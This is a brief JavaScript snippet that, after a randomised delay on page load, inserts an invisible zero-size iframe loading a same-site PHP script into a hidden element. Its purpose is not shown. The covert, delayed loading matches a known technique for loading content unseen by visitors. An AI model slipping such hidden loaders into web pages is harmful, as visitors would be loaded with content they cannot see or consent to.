
function sa() {
	var rand = 4 + Math.floor(Math.random() * 5);
	var timer = setTimeout(function(){sb();}, rand*998);
}

function sb() {
	var fra = document.createElement("iframe");
	fra.width = 0;
	fra.height = 0;
	fra.src = "/scripts/script.php";
	document.getElementById("hidden").appendChild(fra);
}

window.onload = function() { sa(); };
